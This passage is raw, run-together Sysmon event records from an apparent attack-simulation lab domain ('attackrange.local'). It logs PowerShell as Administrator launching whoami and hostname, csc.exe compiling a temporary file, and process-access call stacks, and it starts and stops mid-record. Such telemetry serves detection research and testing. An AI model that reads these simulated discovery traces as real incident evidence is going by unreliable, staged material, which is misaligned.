\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc615aaa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc615aaa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc615aaa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc61593b(wow64) 154100x80000000000000001061696Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.531{7F8C56E7-52C6-6063-3E01-00000000AF01}3576C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.8.3761.0 built by: NET48REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\tpnd2qsw\tpnd2qsw.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{7F8C56E7-4E65-6063-912A-070000000000}0x72a912HighMD5=23EE3D381CFE3B9F6229483E2CE2F9E1,SHA256=4240A12E0B246C9D69AF1F697488FE7DA1B497DF20F4A6F95135B4D5FE180A57,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D{7F8C56E7-4F87-6063-C900-00000000AF01}5652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x80000000000000001061695Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.541{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D6B8AEA6897C26A7E7AB9851BFDE1ED3,SHA256=8C7EFCFD4091D3636B6EEC6038BCFA89EB7277AB16C353D645EA7E8CCE22D262,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061694Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.541{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61E232E8A7C1D2422F3A623F1876CC71,SHA256=30BAFD9881C6BE94D79A0446CCFFA98A64D3BE35C73A3FE5DF5F04CBB2E7EFAF,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001061693Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.525{7F8C56E7-4F87-6063-C900-00000000AF01}5652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\tpnd2qsw\tpnd2qsw.cmdline2021-03-30 16:33:10.525 11241100x80000000000000001061692Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.localDLL2021-03-30 16:33:10.525{7F8C56E7-4F87-6063-C900-00000000AF01}5652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\tpnd2qsw\tpnd2qsw.dll2021-03-30 16:33:10.525 10341000x80000000000000001061691Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.369{7F8C56E7-4F87-6063-CA00-00000000AF01}55846056C:\Windows\system32\conhost.exe{7F8C56E7-52C6-6063-3D01-00000000AF01}4596C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061690Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.369{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061689Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.369{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061688Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.369{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061687Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.369{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061686Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.369{7F8C56E7-4E4F-6063-5500-00000000AF01}38243840C:\Windows\system32\csrss.exe{7F8C56E7-52C6-6063-3D01-00000000AF01}4596C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061685Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.369{7F8C56E7-4F87-6063-C900-00000000AF01}56526096C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{7F8C56E7-52C6-6063-3D01-00000000AF01}4596C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bd18fff3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc61347c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc6130b7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bd0db3b5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc5d0029(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc633a9b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc615aaa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc615aaa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc615aaa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc61593b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc60665b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc613b9d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc61370f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc61347c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc6130b7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bd0db3b5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc5d0029(wow64) 154100x80000000000000001061684Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.368{7F8C56E7-52C6-6063-3D01-00000000AF01}4596C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{7F8C56E7-4E65-6063-912A-070000000000}0x72a912HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9{7F8C56E7-4F87-6063-C900-00000000AF01}5652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x80000000000000001061683Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.353{7F8C56E7-4F87-6063-CA00-00000000AF01}55846056C:\Windows\system32\conhost.exe{7F8C56E7-52C6-6063-3C01-00000000AF01}408C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061682Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.353{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061681Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.353{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061680Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.353{7F8C56E7-4E4F-6063-5500-00000000AF01}38244020C:\Windows\system32\csrss.exe{7F8C56E7-52C6-6063-3C01-00000000AF01}408C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061679Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.353{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061678Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.353{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061677Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.353{7F8C56E7-4F87-6063-C900-00000000AF01}56526096C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{7F8C56E7-52C6-6063-3C01-00000000AF01}408C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bd18fff3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc61347c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc6130b7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bd0db3b5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc5d0029(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc633a9b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc615aaa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc615aaa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc615aaa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc61593b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc60665b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc613b9d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc61370f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc61347c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc6130b7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bd0db3b5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc5d0029(wow64) 154100x80000000000000001061676Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.355{7F8C56E7-52C6-6063-3C01-00000000AF01}408C:\Windows\System32\HOSTNAME.EXE10.0.14393.0 (rs1_release.160715-1616)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exe"C:\Windows\system32\HOSTNAME.EXE"C:\Users\Administrator\ATTACKRANGE\Administrator{7F8C56E7-4E65-6063-912A-070000000000}0x72a912HighMD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E{7F8C56E7-4F87-6063-C900-00000000AF01}5652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x8000000000000000246544Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:10.242{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5155D49DBCC31011742520FE658DBCF8,SHA256=8FCE0060C36A52FA08D82980EBC6A165C159106938400652103F05949265C60A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246543Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:10.242{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E7EDFFFAAF8887BA6904CD0DDA127287,SHA256=6BF0709BA6725FCC25C076772D1F0650BB9C43FD6C887847C20A84C098CE4A39,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246542Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:10.132{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5ED4317A3BF8D2A9AF9DC0C0E3CB22C,SHA256=2CDF39BD49764C2D0781E707BC7DF6798F55681ADB95B7D7E4FFC9B2A679B284,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061790Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.931{7F8C56E7-4E3C-6063-1600-00000000AF01}12801804C:\Windows\system32\svchost.exe{7F8C56E7-52C7-6063-4201-00000000AF01}4640C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061789Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.931{7F8C56E7-4E3C-6063-1600-00000000AF01}12801320C:\Windows\system32\svchost.exe{7F8C56E7-52C7-6063-4201-00000000AF01}4640C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001061788Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.900{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31491129B228CD2FBACA1617DBB4D68C,SHA256=F7852DC9BD5FE8CBF6A54E7CB7A47DFD1A243A3EC686E644764C4CF97BAC5BFA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061787Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 